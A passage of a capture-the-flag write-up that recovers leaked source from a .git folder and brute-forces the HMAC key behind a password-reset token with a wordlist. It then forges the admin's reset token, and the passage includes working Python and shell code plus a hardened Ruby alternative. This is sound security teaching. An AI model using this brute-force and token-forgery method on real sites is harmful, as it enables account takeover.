We have to use the Forgot password feature, so let's check it out.
![forgot_password_check_1](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_4_.png)
I received an email with a token to reset my password.
I tried doing it again and again.
And guess what? It's the same token every time.
![token_email](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_5.png)
So it must be some kind of hash of my email with a constant salt.
We already know the email of the admin ([email protected]), so we just need to find out how it is hashed to get the token and reset the admin's password.
On the home page, there is a link to the [repo](https://github.com/spiders-web/spidersweb) of the challenge. It contains a file `backup.zip`; let's extract it:
```bash
th3jackers$ unzip backup.zip
Archive: backup.zip
inflating: README.md
creating: static/
creating: static/css/
inflating: static/css/foundation.min.css
inflating: static/css/normalize.css
inflating: static/css/main.css
inflating: static/favicon.ico
creating: static/avatars/
inflating: static/avatars/porkey.jpg
inflating: static/avatars/admin.png
inflating: static/avatars/default-avatar.png
inflating: static/avatars/deadpool.jpg
inflating: static/avatars/peterB.png
inflating: static/avatars/peni.jpg
inflating: static/avatars/miles.jpg
inflating: static/avatars/kingpin.jpg
extracting: static/avatars/gwen.png
creating: views/
inflating: views/index.erb
inflating: views/page_visitor.erb
inflating: views/page_user.erb
extracting: views/not_found.erb
creating: .git/
creating: .git/branches/
creating: .git/hooks/
......
```
There is a `.git` folder, how cool is that :3
It contains git objects, which we can use to read old, deleted files with the command `git cat-file OBJECT`.
I used this inline command to go through all objects and read them
(Thanks to [this writeup](https://www.mrt-prodz.com/blog/view/2014/09/no-con-name-ctf-quals-2014---miscall-100pts-writeup) for the tip)
```bash
# Run from inside .git/objects: every loose object lives at <2-hex-char dir>/<38-hex-char file>,
# and directory name + file name concatenated is the full object id that cat-file -p pretty-prints.
for d in *; do for f in $d/*; do git cat-file -p $d$(basename "$f"); done; done
```
Reading through all the files, I finally found what I was looking for:
```ruby
token = OpenSSL::HMAC.hexdigest("SHA256", ENV["SECRET_KEY"], email)
```
I also found this note:
```
- change SECRET_KEY to something stronger
```
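That one-liner and that note together describe the bug: the reset token is a deterministic HMAC of the email under a guessable key, so it never changes and one known (email, token) pair is enough to attack the key offline. As an added example, not code from the challenge's repo or from this writeup, here is that scheme in Ruby beside a hardened reset-token store; `ResetTokenStore`, its `TTL` and the injectable `now` clock are assumed names, not the challenge's.

```ruby
require "openssl"
require "securerandom"
require "digest"

# Vulnerable scheme from the leaked repo: same email + same SECRET_KEY
# always yields the same token, and a weak SECRET_KEY falls to a wordlist.
def weak_token(secret_key, email)
  OpenSSL::HMAC.hexdigest("SHA256", secret_key, email)
end

# Hardened replacement (assumed design): the token is unguessable random
# data, only its digest is stored, it is bound to the account, it expires,
# and it can be redeemed exactly once.
class ResetTokenStore
  TTL = 15 * 60 # seconds a reset link stays valid

  def initialize(now: -> { Time.now.to_i })
    @now = now       # clock is injectable so expiry can be tested deterministically
    @records = {}    # SHA-256(token) => { email:, expires_at: }
  end

  # Returns the plaintext token to put in the email; only its digest is kept,
  # so a leaked table or backup gives an attacker nothing usable.
  def issue(email)
    token = SecureRandom.hex(32) # 256 bits of entropy, 64 hex chars
    @records[Digest::SHA256.hexdigest(token)] = {
      email: email, expires_at: @now.call + TTL
    }
    token
  end

  # Consumes the token. True only if it exists, is unexpired and belongs to
  # the account whose password is being reset; it is removed on first use.
  def redeem(email, token)
    key = Digest::SHA256.hexdigest(token)
    rec = @records[key]
    return false if rec.nil?
    @records.delete(key) # single use, even if the check below fails
    rec[:email] == email && rec[:expires_at] >= @now.call
  end
end
```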
So all that is left to do is to brute-force the key: compute HMAC-SHA256 of my email under each candidate key until it matches the token I already know.
I used `rockyou` as the wordlist; here is my Python script:
```python
import hashlib, hmac

# Token received in the "forgot password" email (placeholder, hex string).
mytoken = "MY_TOKEN"
# Email the token was generated for (placeholder); hmac.new needs bytes.
myemail = b"MY_EMAIL"

with open("/usr/share/wordlists/rockyou.txt", "rb") as f:
    liste = f.readlines()
n = len(liste)

for i in range(n):
    line = liste[i].strip()  # candidate SECRET_KEY
    if hmac.new(line, myemail, digestmod=hashlib.sha256).hexdigest() == mytoken:
        print("FOUND: %s" % line.decode(errors="replace"))
        break
    print("Trying %d/%d" % (i, n))
```
Running it gives us the KEY in a few seconds:
```bash
.....
.....
Trying 91398/14344391
Trying 91399/14344391
Trying 91400/14344391
Trying 91401/14344391
Trying 91402/14344391
Trying 91403/14344391
Trying 91404/14344391
FOUND: spiderpig1
```
Let's calculate the admin's token now, shall we?
```python
>>> import hashlib, hmac
>>> print(hmac.new(b"spiderpig1", b"[email protected]", digestmod=hashlib.sha256).hexdigest())
c1971b6fc5eedfa40d5d96a017b9a439c05f2fe8cdc8d48481e00e0c4580db7d
```
Reset the admin password:
![reset_admin_token](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_6.png)
Et voila
![memehub_flag](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/2_7.png)
Flag: `shellmates{w3lc0me_2_th3_5pid3r_v3rs3}`